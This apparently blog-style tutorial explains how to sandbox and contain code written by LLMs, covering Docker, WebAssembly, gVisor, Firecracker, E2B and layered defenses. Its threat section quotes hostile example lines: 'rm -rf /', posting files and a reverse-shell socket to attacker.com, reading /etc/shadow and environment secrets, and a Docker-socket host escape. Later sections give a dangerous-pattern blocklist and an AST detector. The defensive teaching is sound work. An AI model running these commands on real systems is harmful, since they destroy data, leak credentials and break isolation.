Sandboxing LLM-Generated Code: Running Untrusted AI Code Safely
Docker, WebAssembly, Firecracker, and E2B. How to execute code your LLM generated without burning down your infrastructure.
The Problem: AI Wrote a Rootkit (Probably Not On Purpose)
You're building an AI code generation tool. The LLM writes:
import os
os.system("rm -rf /")
Or maybe it's subtle:
import requests
requests.post("http://attacker.com", data=get_all_files())
Or it's just a bug:
while True:
    huge_array = [0] * 999999999999
Your LLM didn't mean to brick your system. It just hallucinates code sometimes. And now you've got a problem: how do you run code from an untrusted source (even if it's trying to be helpful) without it destroying everything?
This is the sandboxing problem. And in 2026, it's not theoretical anymore. AI agents that execute code, data analysis tools, code generation platforms—they all need to solve this.
The answer is: you can't make it 100% safe, but you can make it safe enough.
Why Should You Care?
If you're building anything with code execution:
- Data analysis platform (user asks AI to process CSV and generate charts)
- Code generation tool (LLM writes code, you run it to test)
- AI agent that writes and executes scripts
- Research tool that evaluates AI-generated code
- Any product where the AI outputs executable code
If you're running AI-generated code:
- You're running untrusted code by definition
- The code might have bugs, backdoors, or unintended side effects
- A single exploit can compromise your entire system
- Your users are trusting you to contain the damage
The industry is waking up to this. GitHub has to reason about execution safety for the code Copilot generates. LangChain is building sandboxing into its framework. E2B raised $30M to commercialize code sandboxing. Google, OpenAI, and Anthropic all have teams focused on this problem.
This isn't optional anymore. It's required infrastructure.
Part 1: Understanding the Threat
Threat 1: Resource Exhaustion
The LLM generates code that:
- Consumes unbounded memory (infinite loops, huge arrays)
- Maxes out CPU (cryptographic operations, tight loops)
- Fills disk space (writing massive files)
Result: Your server crashes. Your other users can't run their code.
Threat 2: Side Channel Access
The code reads files it shouldn't:
with open("/etc/shadow", "r") as f:
    passwords = f.read()
Or accesses environment variables:
import os
print(os.environ) # AWS_SECRET_ACCESS_KEY, DATABASE_PASSWORD, etc.
Result: Credentials leaked. Your database is compromised.
Threat 3: Network Exploitation
The code phones home:
import socket
socket.socket().connect(("attacker.com", 4444))
# Now attacker has reverse shell on your server
Or exfiltrates data:
requests.post("http://attacker.com/steal", json={"data": secret_data})
Result: Your infrastructure is pwned. Your users' data is stolen.
Threat 4: Host Escape
The code breaks out of the sandbox and reaches the host. A classic example: the Docker socket was mounted into the container, so the code can ask the Docker daemon to start a new container with the host's filesystem mounted:
# Only possible if /var/run/docker.sock is exposed inside the sandbox
docker run -v /:/host -it ubuntu chroot /host
Result: Game over. The sandbox is useless.
Threat 5: Side-Channel Attacks
The code doesn't exfiltrate data directly. Instead, it:
- Measures timing to infer secrets
- Uses covert channels (disk I/O patterns, memory access)
- Probes CPU caches to leak data
Result: Data leak that's nearly impossible to detect.
Part 2: Sandbox Options (Tradeoffs)
Option 1: Docker Containers
The Idea: Run the code in a Docker container with limited resources and filesystem access.
FROM python:3.11-slim
WORKDIR /sandbox
COPY user_code.py .
CMD ["python", "user_code.py"]
Run with restrictions:
docker run \
--rm \
--cpus="0.5" \
--memory="512m" \
--read-only \
--tmpfs /tmp:size=100m \
-v /sandbox/input:/input:ro \
sandbox-image
Pros:
- Easy to set up
- Good resource limits
- Familiar technology
- Widely understood
Cons:
- Container escape is possible (though difficult)
- Startup time: 100-500ms (slow for latency-critical apps)
- Storage overhead: each container is hundreds of MB
- Still has access to network by default
- Side-channel attacks still possible within container
When to use: Batch processing, non-sensitive code, when 100ms startup time is acceptable.
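The `docker run` flags above are easy to get subtly wrong, so it helps to assemble them in one place. A minimal sketch in Python; it assumes the Docker CLI is on PATH and that an image named `sandbox-image` exists (both assumptions):

```python
import subprocess

def build_docker_cmd(image: str, cpus: str = "0.5", memory: str = "512m") -> list[str]:
    """Assemble a `docker run` invocation with hardening flags."""
    return [
        "docker", "run",
        "--rm",                       # delete the container when it exits
        "--network=none",             # no network access at all
        f"--cpus={cpus}",             # CPU quota
        f"--memory={memory}",         # hard memory cap
        "--read-only",                # immutable root filesystem
        "--tmpfs", "/tmp:size=100m",  # the only writable area, size-capped
        image,
    ]

def run_sandboxed(image: str, timeout: int = 30) -> subprocess.CompletedProcess:
    """Run the container, killing it if it exceeds a wall-clock timeout."""
    return subprocess.run(build_docker_cmd(image), capture_output=True,
                          text=True, timeout=timeout)
```

Centralizing the flags means a missing `--read-only` shows up in code review instead of in an incident report.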
Option 2: WebAssembly (WASM)
The Idea: Compile code to WebAssembly, run in a WASM runtime. WASM is sandboxed by design—it has no direct OS access.
# Pipeline: Python code → compile to WASM → execute in an isolated runtime.
# The user writes Python; tooling converts it to WASM.
# By default, WASM has zero access to the filesystem, network, or environment.
What the code CAN do:
- math operations
- string manipulation
- data processing
- call whitelisted host functions
What it CANNOT do:
- read files
- make network requests
- access environment variables
- fork processes
- allocate unbounded memory
Pros:
- True isolation (memory-safe by design)
- Super fast startup: under 5ms
- Minimal overhead: single WASM instance
- Fine-grained access control (what functions can code call?)
- Perfect for data processing, transformations
Cons:
- No direct filesystem access (must be provided by host)
- No native libraries (limited to pure code)
- Fewer language options (Python support is experimental)
- Not great for I/O-heavy workloads
When to use: Data transformation, mathematical operations, code that doesn't need filesystem. The future of safe code execution.
Option 3: gVisor (Google's Secure Container Runtime)
The Idea: Run containers, but intercept all system calls and execute them in user-space. Dramatically reduces attack surface.
Regular container: code → Linux kernel (one escape away)
gVisor: code → user-space OS emulation → Linux kernel (much safer)
Pros:
- Much harder to escape than plain containers
- Faster than VMs, slower than bare containers
- Good for defense in depth
Cons:
- Syscall interception costs performance (often cited at 20-30% for syscall-heavy workloads)
- More complex to set up
- Still not unhackable (nothing is)
When to use: When you need container familiarity but more security than standard Docker.
Option 4: Firecracker (AWS's MicroVM)
The Idea: Lightweight virtual machines. Each code execution gets its own kernel, filesystem, etc.
# Spin up a fully isolated microVM, kernel and all, in ~125ms
firecracker --api-sock /tmp/firecracker.sock --config-file config.json
Pros:
- True isolation (separate kernel)
- Very fast: 125ms boot time
- Can run full programs, multiple processes
- Strong security boundary
Cons:
- Heavier than WASM, lighter than Docker
- Requires more infrastructure knowledge
- Memory per instance: ~20MB
When to use: When you need real isolation but still want the flexibility of a full OS.
Option 5: E2B (Managed Sandbox-as-a-Service)
The Idea: Don't build sandboxing yourself. Use E2B, a platform designed for AI-generated code execution.
from e2b import Sandbox

sandbox = Sandbox()
result = sandbox.run_code("python", """
print('Hello from sandbox!')
with open('/tmp/test.txt', 'w') as f:
    f.write('data')
""")
Pros:
- Managed for you (you don't handle infrastructure)
- Built specifically for AI use cases
- Good resource limits, monitoring, isolation
- Fast iterations
Cons:
- Cost per execution (fine for most use cases)
- Vendor lock-in (but worth it for early stage)
- Not for ultra-high-volume workloads
When to use: If you're a startup or building an AI feature and don't want to manage infrastructure.
Part 3: Layered Sandboxing (Defense in Depth)
The smartest approach isn't a single sandbox. It's layers.
Layer 1: Input Validation
Scan the code before executing:
def is_code_safe(code: str) -> bool:
    dangerous_patterns = [
        "os.system",
        "subprocess",
        "__import__",
        "open(",
        "socket",
        "requests.post",
        "eval",
        "exec",
    ]
    for pattern in dangerous_patterns:
        if pattern in code:
            return False
    return True
This won't catch everything (attackers can obfuscate), but it catches obvious stuff.
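String matching is trivially bypassed (think `getattr(os, 'sys' + 'tem')`), so a sturdier cheap pre-filter walks the syntax tree instead. A minimal sketch using Python's stdlib `ast` module; the blocklists are illustrative, not exhaustive:

```python
import ast

BLOCKED_MODULES = {"os", "subprocess", "socket", "requests", "ctypes"}
BLOCKED_CALLS = {"eval", "exec", "compile", "open", "__import__"}

def find_violations(code: str) -> list[str]:
    """Return the reasons the code looks unsafe (empty list = passed)."""
    violations = []
    try:
        tree = ast.parse(code)
    except SyntaxError as e:
        return [f"syntax error: {e}"]
    for node in ast.walk(tree):
        # catches `import os` and `import os.path as p`
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in BLOCKED_MODULES:
                    violations.append(f"import of blocked module: {alias.name}")
        # catches `from os import system`
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in BLOCKED_MODULES:
                violations.append(f"import from blocked module: {node.module}")
        # catches direct calls to eval/exec/open/...
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BLOCKED_CALLS:
                violations.append(f"blocked call: {node.func.id}")
    return violations
```

This still misses obfuscation through getattr chains or encoded strings. Treat it as a cheap pre-filter, never as the security boundary itself.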
Layer 2: Static Analysis
Use tools like Bandit (for Python) to analyze the code's AST:
bandit user_code.py
Detects things like:
- Hardcoded credentials
- Unsafe deserialization
- SQL injection patterns
- Command injection
Layer 3: Process Isolation
Run the code in a sandbox (WASM, container, or both).
Layer 4: Resource Limits
Set hard limits:
import resource

# Max CPU: 5 seconds
resource.setrlimit(resource.RLIMIT_CPU, (5, 5))
# Max memory: 512MB
resource.setrlimit(resource.RLIMIT_AS, (512 * 1024 * 1024, 512 * 1024 * 1024))
# Max open files: 10
resource.setrlimit(resource.RLIMIT_NOFILE, (10, 10))

# Then run user code. Caveat: setrlimit applies to the *current* process,
# so do this in a child process, never in your main server process.
exec(user_code)
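In practice you apply the limits in a child process via `preexec_fn`, so the caps never touch your server. A sketch, Unix-only (the `resource` module doesn't exist on Windows), with a wall-clock timeout layered on top of the CPU limit:

```python
import resource
import subprocess
import sys

def _apply_limits():
    # Runs in the child just before exec; caps CPU seconds and address space.
    resource.setrlimit(resource.RLIMIT_CPU, (5, 5))
    resource.setrlimit(resource.RLIMIT_AS, (512 * 1024 * 1024,) * 2)

def run_untrusted(code: str, wall_timeout: int = 10) -> subprocess.CompletedProcess:
    """Execute code in a fresh interpreter under rlimits plus a wall-clock timeout."""
    return subprocess.run(
        [sys.executable, "-I", "-c", code],  # -I: isolated mode, ignores env and site
        capture_output=True, text=True,
        timeout=wall_timeout,        # wall clock, catches sleep-based stalls
        preexec_fn=_apply_limits,    # rlimits apply only to the child
    )
```

The CPU limit catches tight loops, the address-space limit catches memory bombs, and the wall-clock timeout catches code that just sleeps. You want all three.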
Layer 5: Network Control
Disable network by default:
docker run \
--network=none \
sandbox-image
If the code needs network, whitelist specific endpoints. Note that an environment variable enforces nothing by itself; it only works if a host-side proxy reads it and blocks everything else:
docker run \
--cap-drop=all \
-e ALLOWED_HOSTS="api.example.com" \
sandbox-image
Layer 6: Monitoring & Alerting
Log everything:
- Code execution started/completed
- Resource usage peaks
- Network connections attempted
- Files accessed
- Environment variables read
Alert if:
- Execution time > 30 seconds
- Memory usage > limit
- Unexpected network access
- File access outside /tmp
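The alert rules above are simple threshold checks, sketched here as a pure function over an execution report. The field names are made up for illustration; substitute whatever your runner actually records:

```python
def check_alerts(report: dict) -> list[str]:
    """Map an execution report to a list of alert messages."""
    alerts = []
    if report.get("duration_s", 0) > 30:
        alerts.append("execution exceeded 30s")
    if report.get("peak_memory_mb", 0) > report.get("memory_limit_mb", 512):
        alerts.append("memory usage exceeded limit")
    if report.get("network_attempts", 0) > 0:
        alerts.append("unexpected network access")
    for path in report.get("files_accessed", []):
        if not path.startswith("/tmp"):
            alerts.append(f"file access outside /tmp: {path}")
    return alerts
```

Keeping the rules as data-in, alerts-out makes them unit-testable, which matters: an alerting rule that silently never fires is worse than no rule.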
Part 4: Real-World Example
You're building a data analysis platform. User uploads CSV. AI generates Python code to analyze it:
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('data.csv')
print(df.describe())
Your architecture:
- User uploads CSV → stored in /uploads/{user_id}/data.csv
- User asks AI to analyze → LLM generates Python code
- You validate code → check for dangerous patterns
- Spin up sandbox → WASM or Docker with limits
- Mount CSV as read-only → /data/data.csv (read-only)
- Mount empty tmpfs → /tmp (writable, 100MB limit)
- Run code → it can read /data/data.csv and write to /tmp; it cannot access /uploads, the network, or environment variables
- Collect output → charts and tables generated in /tmp
- Return to user → profit
Attacker tries:
import os
os.system("rm -rf /") # Fails: os.system not available in WASM
# Or if in container: rm -rf / runs but only affects /tmp
Result: Attack neutralized.
Common Mistakes
Mistake 1: Assuming one layer of defense is enough.
Docker alone? Container escape is possible. WASM alone? Side channels exist. Use layers.
Mistake 2: Forgetting about side channels.
You blocked filesystem and network access. But code can infer data through timing, memory access patterns, CPU cache behavior. This is hard to defend against. Assume some data leakage is possible.
Mistake 3: Not limiting resources aggressively.
"256MB memory should be fine." Then the LLM generates a 300MB array allocation, the host runs out of memory, and the kernel's OOM killer starts taking down processes. Other users lose service.
Set limits lower than you think necessary. 128MB for most workloads. Increase if needed.
Mistake 4: Allowing network access.
"The code needs to call an API." So you enable network. Now the code can exfiltrate data.
Use a proxy, whitelist, or have the host make the API call on behalf of the code.
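The "host makes the call" pattern can be sketched as a broker: sandboxed code hands the host a URL, and the host refuses anything off the allowlist. The hostname below is illustrative:

```python
from urllib.parse import urlparse
import urllib.request

ALLOWED_HOSTS = {"api.example.com"}  # illustrative allowlist

def fetch_for_sandbox(url: str, timeout: int = 5) -> bytes:
    """Fetch a URL on behalf of sandboxed code; allowlist enforced host-side."""
    parsed = urlparse(url)
    if parsed.hostname not in ALLOWED_HOSTS:
        raise PermissionError(f"host not allowlisted: {parsed.hostname}")
    if parsed.scheme != "https":
        raise PermissionError("only https is allowed")
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()
```

Because the request never originates inside the sandbox, the code can't smuggle data out to arbitrary endpoints even if it constructs the URL itself; the worst it can do is talk to hosts you already trust.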
Mistake 5: Not monitoring.
"If something goes wrong, we'll notice." No, you won't. Not until your infrastructure is already on fire.
Log everything. Alert on anomalies. Use observability tools.
The Future
The industry is converging on a few approaches:
- WASM for safety-critical code — data transformation, mathematical operations
- Lightweight VMs (Firecracker) for flexibility — full programs that need OS features
- Managed services (E2B) for startups — pay per execution, don't manage infrastructure
The patterns for "AI-generated code execution" are settling into established practice. You won't invent sandboxing from scratch. You'll use proven tools.
But none of them are bulletproof. The game is making attacks expensive, detectable, and limited in scope.
Next Steps
- Start with WASM for data processing — it's the safest, fastest option
- Add input validation — filter dangerous patterns before execution
- Use E2B or similar if you don't want to manage infra — seriously, it's worth it
- Layer defenses — input validation → static analysis → sandbox → resource limits → monitoring
- Test attacks — actually try to break your sandbox. You'll find gaps.
- Monitor in production — set up alerts for suspicious patterns
Sign-Off
The days of blindly running untrusted code are over. In an era where the code is generated by AI, sandboxing isn't paranoia—it's professional responsibility.
You're not protecting against sophisticated hackers. You're protecting against bugs in your own infrastructure, hallucinations in the LLM, and the one attacker who figures out your blind spots.
Build for the worst case. Run everything in a sandbox.
Further Reading
- GitHub - restyler/awesome-sandbox: Awesome Code Sandboxing for AI
- Secure Boundaries: Understanding LLM Sandbox Environments
- Sandboxing Agentic AI Workflows with WebAssembly | NVIDIA Blog
- Code Sandboxes for LLMs and AI Agents | Amir's Blog
- LangChain's Approach To Sandboxing — Native Isolation vs Docker Containers